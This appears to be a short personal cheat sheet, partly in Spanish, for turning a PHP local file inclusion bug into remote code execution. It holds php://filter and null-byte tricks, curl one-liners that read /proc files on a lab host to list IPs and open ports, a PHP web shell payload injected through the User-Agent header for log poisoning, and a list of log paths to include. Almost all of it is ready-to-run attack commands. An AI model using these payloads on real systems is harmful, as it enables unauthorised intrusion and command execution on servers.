
# WRAPPERS
lfi.php?file=php://filter/convert.base64-encode/resource=EXAMPLE.php
%00
?


curl --silent "http://192.168.0.109/lfi.php?file=/proc/sched_debug"
view-source:http://192.168.0.109/lfi.php?file=/proc/net/fib_trie
curl -s "http://192.168.0.109/lfi.php?file=/proc/net/fib_trie" | grep -i "host local" -B 1 | grep -oP "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}" | sort -u
for port in $(curl -s "http://192.168.0.109/lfi.php?file=/proc/net/tcp" | awk '{print $2}' | grep -v "local_address" | awk '{print $2}' FS=":" | sort -u); do echo "[$port] -> Puerto $(echo "ibase=16; $port" | bc)"; done

# SSH
user-agent : <?php system($_GET['cmd']); ?>
curl -s -H  "User-Agent: <?php system(\$_GET['cmd']); ?>" http://localhost/

# LFI A RCE LOG POISONING
/var/log/apache2/access.log	-> APACHE
/var/log/auth.log			-> SSH
/etc/vsftpd.conf			-> FTP (inclusiveness)
/var/log/apache2/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail
/proc/self/envoronment
/proc/self/fd
/var/log/apache2/auth.log
/var/log/apache2/access.log
/var/log/auth


